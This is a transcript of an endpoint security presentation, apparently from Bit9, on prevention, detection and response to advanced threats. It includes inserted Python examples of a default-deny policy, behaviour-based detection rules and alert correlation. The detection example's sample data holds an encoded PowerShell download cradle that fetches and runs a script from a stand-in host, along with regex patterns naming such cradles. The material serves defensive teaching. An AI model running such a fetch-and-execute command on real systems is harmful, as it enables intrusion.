Security Life Cycle for Advanced Threats

Presentation transcript:

Security Life Cycle for Advanced Threats
Lifecycle stages: Prevention, Visibility, Detection, Response (diagram labels: EPP covers Prevent; ETDR covers Detect & Respond).
Speaker notes: Central is visibility. Several tools on the market provide network visibility; visibility at the endpoint is critical. Detection must interpret the visibility data to identify threatening events. Response: how quickly can we understand what happened and scope it? Prevention: how can advanced threats be stopped?

Once Upon A Time… You could keep the enemy at the gates

Technology Has Evolved
- Cloud computing, mobile computing, Internet of Things
- Surface area is ever-increasing
- Perimeters are becoming less relevant
- Everything is connected to something
- Technology is crossing into our physical world
Speaker notes: Let's start with technology. Call it Moore's Law or what you will, but the technology world is evolving at a tremendous pace. Cloud computing, mobile, the Internet of Things are all new realities of the past decade. They have changed the way we interact and interconnect, and consequently this changes how we are vulnerable, the attack surface, and what companies must do to protect themselves. The surface area is constantly expanding: from remote users, to users directly interacting with the cloud (public and private), to personal/business dual-use devices. There is no well-defined perimeter anymore; you might even argue there is no perimeter at all. Firewalls, IDS/IPS, packet inspection, the technologies that rely on a perimeter and choke points, are no longer sufficient.

Threat Actors Have Evolved
- Criminal enterprises: broad-based and targeted attacks; financially motivated; getting more sophisticated
- Hacktivists: targeted and destructive attacks; unpredictable motivations; generally less sophisticated
- Nation-states: targeted and multi-stage attacks; motivated by information and IP; highly sophisticated, endless resources

Endless Stream of News

The Malware Problem By the Numbers (Bit9 MasterMinds, Dallas, TX, 3/26/2013)
- 66% of malware took months or even years to discover (dwell time) [1]
- 69% of intrusions are discovered by an external party [1]
- 155k new malware samples are seen daily [2]
- $5.4M average total cost of a data breach [3]
Sources: 1. 2013 Verizon Data Breach Investigations Report; 2. McAfee Threats Report: First Quarter 2013; 3. Ponemon Institute 2013 Cost of a Data Breach Study

The State of Information Security
- Compromise happens in seconds
- Data exfiltration starts minutes later
- It continues undetected for months
- Remediation takes weeks
- At $341k per incident in forensics costs (http://www.netdiligence.com/files/CyberClaimsStudy-2013.pdf)
THIS IS UNSUSTAINABLE

DON'T OVERCOMPLICATE THE THREAT
Simple threat model: 1: Opportunistic. 2: Not opportunistic ("advanced").

Opportunistic threats find value in our computers. Goal: breadth of access.
"Advanced" threats find value in our data. Goal: precision of access.

How This Impacts Traditional Security
[Two charts of hosts compromised (log scale, 10 to 100k) versus time (week 1 to week 7), each with a horizontal "threshold of detection" line.]
Opportunistic: the goal is to maximize the slope. The curve crosses the threshold of detection and a signature becomes available.
"Advanced": the goal is to minimize the slope. The curve stays below the threshold of detection, so a signature may never become available.

A New Perspective Is Required assume you will be breached compromise is inevitable

“In 2020, enterprises will be in a state of continuous compromise.” Gartner, “Prevention Is Futile in 2020: Protect Information Via Pervasive Monitoring and Collective Intelligence,” Neil MacDonald, May 30, 2013

The Assumption of Breach how will you know? what will you do?

Rethink Your Security Strategy
- Prevention is no longer enough: invest in detection and response
- Traditional approaches are ineffective: move from reactive to proactive
- Security cannot be done in isolation: it is a continuous process

The Adaptive Security Architecture Gartner, “Designing an Adaptive Security Architecture for Protection From Advanced Attacks,” February, 2014


The Adaptive Security Architecture - Capabilities Gartner, “Designing an Adaptive Security Architecture for Protection From Advanced Attacks,” February, 2014

Key Characteristics of "Next Gen" Security
- Forensic-quality data collection and analysis
- Threat intelligence to interpret and prioritize data
- Coverage at all stages of the kill chain, not just the point of delivery
- Based on behaviors and context, not just files/IPs
- Real-time, not scan or snapshot based
- Full historical context of activity
- Information needed to assess impact and scope
- Remediation and containment
- Proactive signature-less prevention techniques
- Adapt based on detection and response
- Incorporate and correlate data from third-party sources
- Export data and alerts to other tools
(Grouped on the slide under Visibility, Detection, Response, Prevention and Integration.)

Security Life Cycle for Advanced Threats (Prevention, Visibility, Detection, Response)

Reduce Attack Surface with Default-Deny (Prevention)
- Traditional EPP failure: scan/sweep based; signature based; blocks known bad
- Success of emerging endpoint prevention solutions: real time; policy based, with policies tailored to the environment; trust based: block all but known good
- Objective: lock down the endpoint/server; reduce the attack surface area; make it as difficult as possible for the advanced attacker
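What "trust based, block all but known good" looks like as policy logic, as an added example that is not Bit9 code and does not model any product's policy language: a default-deny evaluator with four trust sources (approved hashes, trusted publishers, trusted updaters that confer trust on what they install, and explicit bans that win over everything else) plus a monitor mode for rolling the policy out. The hashes, publisher, updater name, file contents and events are all constructed for illustration.

```python
"""Trust-based, default-deny execution policy for an endpoint (added example)."""
import hashlib
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple


@dataclass
class Policy:
    approved_hashes: Set[str]        # known-good file hashes (e.g. taken from a golden image)
    trusted_publishers: Set[str]     # signers whose binaries may run (signature assumed verified by the sensor)
    trusted_updaters: Set[str]       # parent processes allowed to introduce new software
    banned_hashes: Set[str] = field(default_factory=set)  # explicit bans override every other rule
    mode: str = "enforce"            # "enforce" blocks; "monitor" only reports, for policy rollout


@dataclass
class ExecEvent:
    host: str
    path: str
    content: bytes                   # file bytes as seen by the sensor (constructed here)
    signer: Optional[str]            # publisher name if the signature verified, else None
    parent: str                      # image name of the process that launched it


def sha256(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def evaluate(policy: Policy, ev: ExecEvent) -> Tuple[str, str]:
    """Return (verdict, reason). Anything not positively trusted is denied."""
    digest = sha256(ev.content)
    if digest in policy.banned_hashes:           # a ban beats a valid signature
        return "deny", "banned hash"
    if digest in policy.approved_hashes:
        return "allow", "approved hash"
    if ev.signer and ev.signer in policy.trusted_publishers:
        return "allow", "trusted publisher " + ev.signer
    if ev.parent in policy.trusted_updaters:
        # Trust inheritance: software delivered by an approved updater becomes
        # approved by hash, so later executions on any host match directly.
        policy.approved_hashes.add(digest)
        return "allow", "installed by trusted updater " + ev.parent
    # Default deny: unknown code does not run, however harmless it looks.
    if policy.mode == "monitor":
        return "report", "would be denied (unknown, monitor mode)"
    return "deny", "unknown (default-deny)"


def evaluate_all(policy: Policy, events: List[ExecEvent]) -> List[Tuple[str, str, str, str]]:
    """Evaluate events in order; returns (host, path, verdict, reason) per event."""
    return [(ev.host, ev.path, *evaluate(policy, ev)) for ev in events]


# Constructed policy and event stream (hashes derive from made-up file contents).
GOLDEN_IMAGE_BINARY = b"known good notepad bytes"
BANNED_BINARY = b"remote admin tool the policy bans"


def make_sample_policy() -> Policy:
    return Policy(
        approved_hashes={sha256(GOLDEN_IMAGE_BINARY)},
        trusted_publishers={"Contoso Software Ltd"},
        trusted_updaters={"sccm-agent.exe"},
        banned_hashes={sha256(BANNED_BINARY)},
    )


SAMPLE_EVENTS = [
    ExecEvent("ws-001", r"C:\Windows\notepad.exe", GOLDEN_IMAGE_BINARY, None, "explorer.exe"),
    ExecEvent("ws-001", r"C:\Program Files\Contoso\app.exe", b"signed vendor app", "Contoso Software Ltd", "explorer.exe"),
    ExecEvent("ws-001", r"C:\Users\jdoe\Downloads\invoice.exe", b"unknown dropper", None, "winword.exe"),
    ExecEvent("ws-001", r"C:\Program Files\Tool\tool.exe", b"deployed by sccm", None, "sccm-agent.exe"),
    ExecEvent("ws-002", r"C:\Program Files\Tool\tool.exe", b"deployed by sccm", None, "explorer.exe"),
    ExecEvent("ws-002", r"C:\Temp\rat.exe", BANNED_BINARY, "Contoso Software Ltd", "explorer.exe"),
]

if __name__ == "__main__":
    for host, path, verdict, reason in evaluate_all(make_sample_policy(), SAMPLE_EVENTS):
        print(f"{host} {verdict:6} {path}  ({reason})")
```

The ordering of the checks is the security-relevant part: the ban is tested before the publisher, so a signed binary the organisation has chosen to ban still does not run, and the unknown download launched from Word is denied with no signature involved. Monitor mode returns "report" instead of "deny" so the same evaluator can be used to measure what a policy would block before it is enforced.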

Detect in Real-time and Without Signatures (Detection)
- Traditional EPP failure: scan/sweep based; small signature database
- Success of emerging endpoint detection solutions: large global database of threat intelligence; signature-less detection through threat indicators; watchlists
- Objective: prepare for the inevitability of breach and a continuous state of compromise; cover more of the kill chain than prevention; enable rapid response
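The kind of rule set the slide describes, as an added example that is not Bit9 code: behaviour rules (an Office application spawning a script host; an encoded PowerShell command line, which the rule decodes so the download cradle hidden inside becomes visible) and watchlist matching on file hashes and DNS lookups, run over a constructed stream of recorded process events. The event fields, hashes, domain and rule names are assumptions, not any product's schema.

```python
"""Signature-less detection over recorded endpoint process events (added example)."""
import base64
import ntpath
import re
from typing import Callable, Dict, List, Optional

# Constructed watchlist: indicators from threat intelligence, not AV signatures.
WATCHLIST = {
    "sha256": {"e" * 64},
    "domains": {"files.invalid-example.test"},
}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
# -e / -enc / -encodedcommand followed by a base64 token.
ENC_RE = re.compile(r"(?i)\s-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
CRADLE_RE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression")


def _encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand is base64 of the UTF-16LE script (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed recorded history: a macro document launches hidden PowerShell,
# which fetches a script and drops a watchlisted binary into %TEMP%.
SAMPLE_EVENTS = [
    {"ts": 1, "host": "ws-017", "pid": 1000, "ppid": 400, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe", "sha256": "a" * 64, "dns": []},
    {"ts": 2, "host": "ws-017", "pid": 3001, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n invoice.docm', "sha256": "b" * 64, "dns": []},
    {"ts": 3, "host": "ws-017", "pid": 4120, "ppid": 3001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://files.invalid-example.test/a.ps1')"),
     "sha256": "c" * 64, "dns": ["files.invalid-example.test"]},
    {"ts": 4, "host": "ws-017", "pid": 5000, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir", "sha256": "d" * 64, "dns": []},
    {"ts": 5, "host": "ws-017", "pid": 6000, "ppid": 4120,
     "image": r"C:\Users\jdoe\AppData\Local\Temp\update.exe",
     "cmdline": "update.exe", "sha256": "e" * 64, "dns": []},
]


def _name(image: str) -> str:
    return ntpath.basename(image).lower()


def _decode_encoded_command(cmdline: str) -> Optional[str]:
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:          # binascii.Error is a ValueError: malformed base64
        return None


def rule_office_spawns_script_host(ev: dict, ctx: dict) -> Optional[str]:
    parent = ctx["procs"].get((ev["host"], ev["ppid"]))
    if parent and _name(parent["image"]) in OFFICE_APPS and _name(ev["image"]) in SCRIPT_HOSTS:
        return f"{_name(parent['image'])} spawned {_name(ev['image'])}"
    return None


def rule_encoded_powershell(ev: dict, ctx: dict) -> Optional[str]:
    if _name(ev["image"]) != "powershell.exe":
        return None
    decoded = _decode_encoded_command(ev["cmdline"])
    if decoded is None:
        return None
    prefix = "download cradle in " if CRADLE_RE.search(decoded) else ""
    return prefix + "encoded command: " + decoded.strip()


def rule_watchlist_hash(ev: dict, ctx: dict) -> Optional[str]:
    return f"hash {ev['sha256'][:12]} on watchlist" if ev["sha256"] in ctx["watchlist"]["sha256"] else None


def rule_watchlist_domain(ev: dict, ctx: dict) -> Optional[str]:
    hits = [d for d in ev.get("dns", []) if d in ctx["watchlist"]["domains"]]
    return "resolved watchlisted domain " + ", ".join(hits) if hits else None


RULES: List[tuple] = [
    ("office_spawns_script_host", rule_office_spawns_script_host),
    ("encoded_powershell", rule_encoded_powershell),
    ("watchlist_hash", rule_watchlist_hash),
    ("watchlist_domain", rule_watchlist_domain),
]


def detect(events: List[dict], watchlist: Dict[str, set] = WATCHLIST) -> List[dict]:
    """Run every rule over every event (time order); parent lookups use the recorded history."""
    ctx = {"procs": {(e["host"], e["pid"]): e for e in events}, "watchlist": watchlist}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        for rule_name, fn in RULES:
            detail = fn(ev, ctx)
            if detail:
                alerts.append({"rule": rule_name, "host": ev["host"], "pid": ev["pid"],
                               "image": _name(ev["image"]), "detail": detail})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['host']} pid={a['pid']} {a['rule']}: {a['detail']}")
```

None of the four rules needs a signature for the PowerShell stage or the document: the first two fire on behaviour and context (who spawned whom, how the command line was shaped), and the decoded command is attached to the alert so an analyst sees the cradle rather than a base64 blob. The watchlist rules are where intelligence plugs in; the hash only matches the dropped file, which is why behaviour rules cover more of the kill chain than a hash alone.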

Rapidly Respond to Attacks in Motion (Response)
- Traditional EPP failure: expensive external consultants; relies heavily on disk and memory artifacts for recorded history
- Success of emerging endpoint incident response solutions: real-time, continuous recorded history in a centralized database delivers IR in seconds; attack process visualization and analytics; better, faster and less expensive
- Objective: pre-breach rapid incident response; better prepare prevention moving forward

Too Much Data, Not Enough Intelligence
- Integrate your tools: attacks happen on endpoints; correlate network and endpoint data for actionable intelligence
- Incorporate threat intelligence: what happens to someone else can happen to you; filter, prioritize and alert on third-party feeds, reputation and indicators
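What the two previous slides describe (a continuous recorded history that lets you scope an attack in seconds, and network/endpoint correlation enriched by third-party feeds) carried through on constructed data, as an added example that is not Bit9 code: a network alert is matched to the endpoint connection record and the process that made it, the destination is scored against several intel feeds, the process lineage is walked back to its root, and every host that ran the same file hash is listed. Hosts, IP addresses (documentation ranges), hashes, feed names, timestamps and the priority thresholds are all assumptions.

```python
"""Network alert + endpoint history + threat intel -> scoped, prioritized incident (added example)."""
from typing import Dict, List, Optional, Tuple

# Constructed continuous recorded history from endpoint sensors (process starts).
PROCESS_HISTORY = [
    {"host": "ws-017", "pid": 1000, "ppid": 400, "image": "explorer.exe", "sha256": "a" * 64},
    {"host": "ws-017", "pid": 3001, "ppid": 1000, "image": "WINWORD.EXE", "sha256": "b" * 64},
    {"host": "ws-017", "pid": 4120, "ppid": 3001, "image": "powershell.exe", "sha256": "c" * 64},
    {"host": "ws-017", "pid": 6000, "ppid": 4120, "image": "update.exe", "sha256": "e" * 64},
    {"host": "ws-042", "pid": 2200, "ppid": 900, "image": "update.exe", "sha256": "e" * 64},
    {"host": "ws-099", "pid": 3300, "ppid": 900, "image": "chrome.exe", "sha256": "f" * 64},
]
# Constructed endpoint network-connection records (which process opened which connection).
NETCONN_HISTORY = [
    {"host": "ws-017", "src_ip": "10.0.5.17", "pid": 6000, "dst_ip": "203.0.113.45", "dst_port": 443, "ts": 1000},
    {"host": "ws-099", "src_ip": "10.0.5.99", "pid": 3300, "dst_ip": "198.51.100.7", "dst_port": 443, "ts": 1010},
]
# Constructed third-party feeds: the same indicator can carry different confidence in each.
THREAT_FEEDS = [
    {"feed": "commercial-a", "ip": "203.0.113.45", "confidence": 90},
    {"feed": "community", "ip": "203.0.113.45", "confidence": 40},
    {"feed": "community", "ip": "198.51.100.7", "confidence": 30},
]
# Constructed alerts from a network sensor; the third comes from a device with no endpoint agent.
NETWORK_ALERTS = [
    {"id": "n-1", "ts": 1003, "src_ip": "10.0.5.17", "dst_ip": "203.0.113.45", "dst_port": 443},
    {"id": "n-2", "ts": 1012, "src_ip": "10.0.5.99", "dst_ip": "198.51.100.7", "dst_port": 443},
    {"id": "n-3", "ts": 1020, "src_ip": "10.0.9.4", "dst_ip": "203.0.113.45", "dst_port": 443},
]

ProcKey = Tuple[str, int]


def index_processes(history: List[dict]) -> Dict[ProcKey, dict]:
    return {(p["host"], p["pid"]): p for p in history}


def indicator_confidence(ip: str, feeds: List[dict]) -> int:
    """Highest confidence any feed assigns to the indicator; 0 when no feed knows it."""
    return max((f["confidence"] for f in feeds if f["ip"] == ip), default=0)


def correlate(alert: dict, netconns: List[dict], window: int = 30) -> Optional[dict]:
    """Find the endpoint connection record behind a network alert (same 4-tuple, close in time)."""
    for c in netconns:
        same_flow = (c["src_ip"], c["dst_ip"], c["dst_port"]) == (alert["src_ip"], alert["dst_ip"], alert["dst_port"])
        if same_flow and abs(c["ts"] - alert["ts"]) <= window:
            return c
    return None


def lineage(host: str, pid: int, procs: Dict[ProcKey, dict], max_depth: int = 32) -> List[str]:
    """Walk the parent chain from the recorded history; root first. Guards against loops."""
    chain, seen, key = [], set(), (host, pid)
    while key in procs and key not in seen and len(chain) < max_depth:
        seen.add(key)
        chain.append(procs[key]["image"])
        key = (host, procs[key]["ppid"])
    return list(reversed(chain))


def scope_by_hash(sha256: str, history: List[dict]) -> List[str]:
    """Every host whose recorded history shows the same file executing."""
    return sorted({p["host"] for p in history if p["sha256"] == sha256})


def triage(alert: dict, netconns: List[dict] = NETCONN_HISTORY,
           history: List[dict] = PROCESS_HISTORY, feeds: List[dict] = THREAT_FEEDS) -> dict:
    confidence = indicator_confidence(alert["dst_ip"], feeds)
    incident = {"alert": alert["id"], "confidence": confidence, "host": None, "process": None,
                "lineage": [], "affected_hosts": [], "priority": "low", "note": ""}
    conn = correlate(alert, netconns)
    if conn is None:
        # A visibility gap is itself a finding: a high-confidence indicator with no endpoint record.
        incident["note"] = "no endpoint record in window: host may have no sensor"
        incident["priority"] = "investigate" if confidence >= 70 else "low"
        return incident
    procs = index_processes(history)
    proc = procs.get((conn["host"], conn["pid"]))
    if proc is None:
        incident.update(host=conn["host"], note="connection recorded but process start missing")
        return incident
    incident.update(host=conn["host"], process=proc["image"],
                    lineage=lineage(conn["host"], conn["pid"], procs),
                    affected_hosts=scope_by_hash(proc["sha256"], history))
    incident["priority"] = "high" if confidence >= 70 else "low"
    if incident["priority"] == "high" and len(incident["affected_hosts"]) > 1:
        incident["priority"] = "critical"   # confirmed bad and already on more than one host
    return incident


if __name__ == "__main__":
    for a in NETWORK_ALERTS:
        print(triage(a))
```

Three things the raw network alert could not tell you fall out of the join: which process on which host opened the connection, that it descends from a Word document, and that a second host has already run the same binary. The third alert shows the caveat a practitioner should keep in mind: correlation only works where a sensor recorded the host, so an unmatched high-confidence alert is routed to investigation rather than silently dropped.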

Summary
- The threat landscape continues to evolve: the enemy is more advanced, attacks are more targeted
- Rethink your security strategy; traditional security tools are insufficient
- Assume you will be breached
- Invest in the entire lifecycle: detection, response and prevention
- Don't treat security tools as islands; integrate them

Endpoint Threat Detection, Response and Prevention for DUMMIES Download the eBook at… Bit9.com eBook resources section https://www.bit9.com/resources/ebooks/endpoint-threat-detection-response-prevention-dummies/

Questions?